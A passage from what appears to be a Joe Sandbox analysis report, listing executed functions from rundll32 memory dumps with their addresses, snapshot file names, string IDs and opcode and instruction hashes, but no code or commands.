                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ab9c47323cb038431254cfcfede8c87b8902d9874b61e33b57791f17de10fd8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4541F831F002059BFB1CAB69AC6076E77A7DFC4214F54906DDB06EB391CE3AAC068794

                                                                                                                                                                                                                                          Executed Functions

                                                                                                                                                                                                                                          Function 07070040 Relevance: 1.7, Strings: 1, Instructions: 471COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357431956.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_7070000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: \;q
                                                                                                                                                                                                                                          • API String ID: 0-705206692
                                                                                                                                                                                                                                          • Opcode ID: d2f79d8b321fc541feecaf91f2f3ff22d30bba19691d668c10bb13d2f0284aab
                                                                                                                                                                                                                                          • Instruction ID: 95b540b97b4667e4ebde2d5d5bb7a514dfc2d0e0f0ab300c6beb7a21a95e6eb3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d2f79d8b321fc541feecaf91f2f3ff22d30bba19691d668c10bb13d2f0284aab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F224A70E1061ACFDB14DF78C85469DB7F2BF89300F1187A9E846AB351EB74A985CB90
                                                                                                                                                                                                                                          Function 04C3746A Relevance: 20.9, Strings: 16, Instructions: 918COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: q$$&q$(_q$4'q$4'q$4'q$4'q$4cq$4cq$@bq$|-q$$q$$q$cq$cq$q
                                                                                                                                                                                                                                          • API String ID: 0-2092175375
                                                                                                                                                                                                                                          • Opcode ID: 83afbe92b97b6a3e3c9d96c9cebfd520fa313846348c5a0be40f9251a8d18e9f
                                                                                                                                                                                                                                          • Instruction ID: 79c446ec64ff8e7c7dc4a0649d2d32d00a9e40a40dabe5f11db480574ef37ede
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 83afbe92b97b6a3e3c9d96c9cebfd520fa313846348c5a0be40f9251a8d18e9f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D7A2F674E012189FDB259F60D851BEDBBB2BF8A300F1085EAD5096B290DF359E85DF81
                                                                                                                                                                                                                                          Function 04C374C0 Relevance: 20.9, Strings: 16, Instructions: 867COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: q$$&q$(_q$4'q$4'q$4'q$4'q$4cq$4cq$@bq$|-q$$q$$q$cq$cq$q
                                                                                                                                                                                                                                          • API String ID: 0-2092175375
                                                                                                                                                                                                                                          • Opcode ID: 5dbfc41585665ef896b1667c2b4a126419525847a6e6cabfb9613d9bc63a5a89
                                                                                                                                                                                                                                          • Instruction ID: c86fb796adabfe11a77e158411c107c08b5ae7c6a51aeec006d7aa1911093391
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5dbfc41585665ef896b1667c2b4a126419525847a6e6cabfb9613d9bc63a5a89
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8392E574E002189FDB259F60D855BEEBBB2BF8A301F2085E9D5096B250DF359E81DF81
                                                                                                                                                                                                                                          Function 04C3B688 Relevance: 6.5, Strings: 5, Instructions: 220COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$\;q$l;et$?et$|q
                                                                                                                                                                                                                                          • API String ID: 0-1828330019
                                                                                                                                                                                                                                          • Opcode ID: bfda5153a0748364741a3f25878fab303d4636b05c8f4cda5ef39aa7aa189689
                                                                                                                                                                                                                                          • Instruction ID: 3ab1ffac69d1547414a80d5bdf26a25db1c004fd78e12567df71cde121cf7b48
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bfda5153a0748364741a3f25878fab303d4636b05c8f4cda5ef39aa7aa189689
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0B610475F042164BE7189A3A985077EB7A7BFC5245B28802AD901D7395FE34FD0387A2
                                                                                                                                                                                                                                          Function 04C3B9F8 Relevance: 5.3, Strings: 4, Instructions: 270COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$(q$(q$(q
                                                                                                                                                                                                                                          • API String ID: 0-4048435238
                                                                                                                                                                                                                                          • Opcode ID: 7b1522f033bae6704d1197ec8981d3d4cc6a090c578b595399b053f5b83cfbcc
                                                                                                                                                                                                                                          • Instruction ID: e3d9e8434f2993b4f099c813ed29a22eab4cad3736298d3a2cfc7dc79c154088
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7b1522f033bae6704d1197ec8981d3d4cc6a090c578b595399b053f5b83cfbcc
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: AA81F531B002148FDB14DF79E454A9E7BE6EF88751B1440AAE50ADB3A1EE34EE01C7D5
                                                                                                                                                                                                                                          Function 04C385C0 Relevance: 2.9, Strings: 2, Instructions: 435COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$d
                                                                                                                                                                                                                                          • API String ID: 0-1617062230
                                                                                                                                                                                                                                          • Opcode ID: 13f3a4e9ada1ea3638e0c5ba4ce0180803790afeed4c9776b53c237f3e0d85ad
                                                                                                                                                                                                                                          • Instruction ID: c1108901fe91c33c6e9de99bb90b65ba4056aa64d4294c22fe46bb50b44cb51f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 13f3a4e9ada1ea3638e0c5ba4ce0180803790afeed4c9776b53c237f3e0d85ad
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FC029C74B006058FD720DF19C480A6ABBF2FF89315B25CA69E45A9B365D730FD46CBA0
                                                                                                                                                                                                                                          Function 04C36C20 Relevance: 2.8, Strings: 2, Instructions: 338COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$|7et
                                                                                                                                                                                                                                          • API String ID: 0-2073623880
                                                                                                                                                                                                                                          • Opcode ID: d4a068eeba21e3706ceb00a9e87a5aacc4dcc2400a2c7e89969ac76a658bf75c
                                                                                                                                                                                                                                          • Instruction ID: 38e948de77768e38bf68838500823e2223d6b0c5c79349fdc426b731c5eff290
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d4a068eeba21e3706ceb00a9e87a5aacc4dcc2400a2c7e89969ac76a658bf75c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8CC1CF74B002159FD724DFA9D450A6EBBF3BFC8211B28896DE44A9B354DB34ED42CB81
                                                                                                                                                                                                                                          Function 04C330EC Relevance: 2.7, Strings: 2, Instructions: 186COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$LRq
                                                                                                                                                                                                                                          • API String ID: 0-2259313658
                                                                                                                                                                                                                                          • Opcode ID: c67b31ac2833f6e522c54bd23a27314e3c64d50fba9ee88de0388a6406c38b66
                                                                                                                                                                                                                                          • Instruction ID: 5a708032a2b4385b9c4bc97415715baaa6dd0274098e26c9cbe9884983635a25
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c67b31ac2833f6e522c54bd23a27314e3c64d50fba9ee88de0388a6406c38b66
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 30513A35B043945FE7189B74981477E3BA7EFC5215F14846EE806DB2A2DE38EC058395
                                                                                                                                                                                                                                          Function 04C31630 Relevance: 2.7, Strings: 2, Instructions: 157COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: $q$$q
                                                                                                                                                                                                                                          • API String ID: 0-3126353813
                                                                                                                                                                                                                                          • Opcode ID: 00d7dd829c944e50642b6fded122b46bb6aab3020ec9db9ffe4ea87a110c4f45
                                                                                                                                                                                                                                          • Instruction ID: a42af21e15f2bc45a10ecfd209197feef3597c8090fe46221901667db443cd3f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 00d7dd829c944e50642b6fded122b46bb6aab3020ec9db9ffe4ea87a110c4f45
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3951AF35B012089FDB14DFB9D850AAEBBF6FBC9351B18812AE415D7364DE30AD0287A1
                                                                                                                                                                                                                                          Function 04C34EC0 Relevance: 2.6, Strings: 2, Instructions: 143COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$4'q
                                                                                                                                                                                                                                          • API String ID: 0-1357480937
                                                                                                                                                                                                                                          • Opcode ID: de2cad4cd9a7935566182597a9e32858e002d6f7d9d429a8444adc2c0db69f6c
                                                                                                                                                                                                                                          • Instruction ID: f614bae627faee58abe28f2b4c091896765cdab18dc2f89e3de44f3efe10996d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de2cad4cd9a7935566182597a9e32858e002d6f7d9d429a8444adc2c0db69f6c
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C941CA34B003058FDB18EF68D850A9EB7A3AFC8241728859DD509CF355DE34ED068BAA
                                                                                                                                                                                                                                          Function 04C3A228 Relevance: 2.6, Strings: 2, Instructions: 135COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$(q
                                                                                                                                                                                                                                          • API String ID: 0-2485164810
                                                                                                                                                                                                                                          • Opcode ID: f1123f3cfd1ee736819a85db8805dd1820e8465bd18daf75e0e3844b8761e6ed
                                                                                                                                                                                                                                          • Instruction ID: 3a76c478d64a1c0c5d235bd80b0fc00c516d015b55dafc1dad55082242fbd705
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1123f3cfd1ee736819a85db8805dd1820e8465bd18daf75e0e3844b8761e6ed
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8141F634B042049FD715DB65C894BAEBBF2EF89310F24819DD845AB391CB36ED02CB90
                                                                                                                                                                                                                                          Function 04C3EA88 Relevance: 2.6, Strings: 2, Instructions: 121COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q$T;et
                                                                                                                                                                                                                                          • API String ID: 0-386171901
                                                                                                                                                                                                                                          • Opcode ID: 693b5506ef17ba96ab3fcf7348a6f111c1ae3369bfc0c976d3c79a32501bf031
                                                                                                                                                                                                                                          • Instruction ID: 4597ed94537138f96e6c2f00e1d187828e032faf1168b40fd8319c1bad07b446
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 693b5506ef17ba96ab3fcf7348a6f111c1ae3369bfc0c976d3c79a32501bf031
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0831F235B002054FDB08DB6ED85596EBBE7EFC4265B144179E506CB390EE34ED028B95
                                                                                                                                                                                                                                          Function 04C3E1F0 Relevance: 1.6, Strings: 1, Instructions: 325COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (Aq
                                                                                                                                                                                                                                          • API String ID: 0-165228061
                                                                                                                                                                                                                                          • Opcode ID: 9132f8acd24895d27a6cc71907b9b32b22c3389085b21bc0c39b7e174582c899
                                                                                                                                                                                                                                          • Instruction ID: f8d5fdc53e4533a9e0066de64faf765fa100749125b1b4c50ddcbc3a628721c3
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9132f8acd24895d27a6cc71907b9b32b22c3389085b21bc0c39b7e174582c899
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 88C15C74B002199FDB14DFA9D994AAEBBB2BF88311F144129D406EB394DF34AD06CB91
                                                                                                                                                                                                                                          Function 04C399B8 Relevance: 1.6, Strings: 1, Instructions: 324COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: 120d17516a9e2ec97ed5931c4d6e6ed216083827ef387a891f22af230dcf1644
                                                                                                                                                                                                                                          • Instruction ID: 21d2fa683e997351d6b27cdd7051285bae9f6dc8a42ea266204ef3ac9f4f36c9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 120d17516a9e2ec97ed5931c4d6e6ed216083827ef387a891f22af230dcf1644
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 01E17B74A003598FDB15CFA8C884A9DBBF2FF89301F158295D808AB365DB74ED46CB90
                                                                                                                                                                                                                                          Function 07079FE0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 07079FF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357431956.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_7070000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 6842923-0
                                                                                                                                                                                                                                          • Opcode ID: 2e3891ac45963a685e588265166b60c46737e0e8884ca252787c0c939c7882b1
                                                                                                                                                                                                                                          • Instruction ID: 561cfd97f4c7954cfbf7c376adca644836d28f4dd0d30b6ab51cd2a6877da9cc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2e3891ac45963a685e588265166b60c46737e0e8884ca252787c0c939c7882b1
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F113AF5F012059FDB14CA7CD4407EDBBE1EB89325F14CA25E525D3290EA36A818CBD4
                                                                                                                                                                                                                                          Function 07079FD0 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • KiUserExceptionDispatcher.NTDLL ref: 07079FF8
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357431956.0000000007070000.00000040.00000800.00020000.00000000.sdmp, Offset: 07070000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_7070000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: DispatcherExceptionUser
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 6842923-0
                                                                                                                                                                                                                                          • Opcode ID: 86b3679ffe8b27e99ed79264ecac1348f28c88d863c303f71cad185d1ab3ea0b
                                                                                                                                                                                                                                          • Instruction ID: aba9e03b81111895362f1486ceec8cda558bbd6371979ba5ceb7e6d4e7a66a5b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 86b3679ffe8b27e99ed79264ecac1348f28c88d863c303f71cad185d1ab3ea0b
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 671105F1E013459FDB15CA3CC4447EDBBE1EB45325F24CA18D921A3190EB35A818CBD4
                                                                                                                                                                                                                                          Function 04C3BE40 Relevance: 1.5, Strings: 1, Instructions: 273COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Qnn^
                                                                                                                                                                                                                                          • API String ID: 0-1329331580
                                                                                                                                                                                                                                          • Opcode ID: 7dbb17848f791f3dc32e5d4c30ebeff5979cd2766a9af5e61b3add415ac96ccd
                                                                                                                                                                                                                                          • Instruction ID: 2d4f72e83461e4568fc3c5e2ae0fb2acba348ff37838761a73eb77866576c032
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7dbb17848f791f3dc32e5d4c30ebeff5979cd2766a9af5e61b3add415ac96ccd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 57B18F78B007058FDB15DF38C89496EBBF2FF88211B148669E9469B365DB34EC06CB91
                                                                                                                                                                                                                                          Function 04C31080 Relevance: 1.5, Strings: 1, Instructions: 212COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: d80147fc2b21c5e5de24bc01f070751802d726835137951996b4969111f5c9c9
                                                                                                                                                                                                                                          • Instruction ID: 214daf9ed54206f94caa827ae29f080de5920d7c770681ba049e35771bbba8a9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d80147fc2b21c5e5de24bc01f070751802d726835137951996b4969111f5c9c9
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C571C635B002149FEB14EBB5C854BAEBAA7FFC8211F188069E506DB394DE35ED029791
                                                                                                                                                                                                                                          Function 04C36048 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: a196786d02cd3abb5b8aeab2f771ddc55c322d3222bae71cd3ee9bfa78561659
                                                                                                                                                                                                                                          • Instruction ID: 5d4876eb19166bf90c7811d1ab09faa5ebfde2b6c8f9dda300b992f30d8fd391
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a196786d02cd3abb5b8aeab2f771ddc55c322d3222bae71cd3ee9bfa78561659
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D0713D74E003189FEB15EBE4C850BDEBBB2EF88310F104469D546AB7A0DE35AD469B61
                                                                                                                                                                                                                                          Function 04C3BE33 Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: Qnn^
                                                                                                                                                                                                                                          • API String ID: 0-1329331580
                                                                                                                                                                                                                                          • Opcode ID: d07fb5ed79376b16df79fa8568ca463e03151d50370bd0cef1c6abe32d12729f
                                                                                                                                                                                                                                          • Instruction ID: 6e93be3eb655435968d50f1cbefa6eb55c5f3d5cf80c799cefe53ac2e5bf7cab
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d07fb5ed79376b16df79fa8568ca463e03151d50370bd0cef1c6abe32d12729f
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E717C78B007018FD715DF38D4949AEFBF2BF89210B048669E9469B355EB34ED06CB91
                                                                                                                                                                                                                                          Function 04C368E0 Relevance: 1.4, Strings: 1, Instructions: 188COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: (q
                                                                                                                                                                                                                                          • API String ID: 0-2414175341
                                                                                                                                                                                                                                          • Opcode ID: 9b6a93602f8a7441acb3cca1e69e519fe5e726faada03738dee1580680c09455
                                                                                                                                                                                                                                          • Instruction ID: b7f510ae17bd9e24c59aeb576b3705de6a25747d418b8cb2c5dce23662e4c1d7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b6a93602f8a7441acb3cca1e69e519fe5e726faada03738dee1580680c09455
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4B61397AB002099FDB11CF68D8809AABBF6FF8D31071581A9E949DB321D731ED15CB90
                                                                                                                                                                                                                                          Function 04C3E7D8 Relevance: 1.4, Strings: 1, Instructions: 181COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000003.1357312603.0000000004C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04C30000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_3_4c30000_rundll32.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID: L<et
                                                                                                                                                                                                                                          • API String ID: 0-2450853546
                                                                                                                                                                                                                                          • Opcode ID: c0eb54df13eaf20b6e428ccfce87f6caf727115516333071466f9042b991292e
                                                                                                                                                                                                                                          • Instruction ID: 40555d1dfd76db8cb1211c2ded117c4308ea370a360d6d316ca52f84951e316c
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c0eb54df13eaf20b6e428ccfce87f6caf727115516333071466f9042b991292e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EC617C34B002048FDB14DF6AD555BAEBBF7BF88611B248129D406EB394DF74AD018B91
                                                                                                                                                                                                                                          Function 04C36C10 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
